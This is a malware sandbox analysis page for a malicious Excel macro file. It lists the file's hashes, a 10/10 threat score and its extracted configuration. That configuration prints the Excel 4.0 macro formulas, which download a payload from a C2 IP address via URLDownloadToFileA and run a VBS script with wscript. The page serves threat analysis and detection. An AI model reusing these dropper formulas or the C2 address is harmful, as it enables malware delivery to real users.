c3e22bb31d6267cfa8a88ce9a2d36d0c | Triage

Submit
Reports

Overview

overview

Static

static

c3e22bb31d...c.xlsm

windows7-x64

c3e22bb31d...c.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

c3e22bb31d6267cfa8a88ce9a2d36d0c.xlsm

Resource

win7-20231129-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

c3e22bb31d6267cfa8a88ce9a2d36d0c.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

8 signatures

150 seconds

General

Target

c3e22bb31d6267cfa8a88ce9a2d36d0c
Size

6KB
MD5

c3e22bb31d6267cfa8a88ce9a2d36d0c
SHA1

b74306dcf868274cec572b12f33d25fb9f2b5815
SHA256

3bed41030d8f1f89cebf2f8b2d84fbd643c9df2e4ec266ab72c526d898af1587
SHA512

c5770995c9c14b1daa80247117aeb2395083c0dac5c07d7d919bc35fceb08120bbcc646e42c626168da73c74d80621d8980754786e90037287f5447541e8be8a
SSDEEP

192:NDSDuSVbrA2OmmfR48UhHFBFYu2b98y4O5+Z:NMuOM2w+1FYvb98y4OA

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

c3e22bb31d6267cfa8a88ce9a2d36d0c
.xlsm office2007

© 2018-2025

Terms | Privacy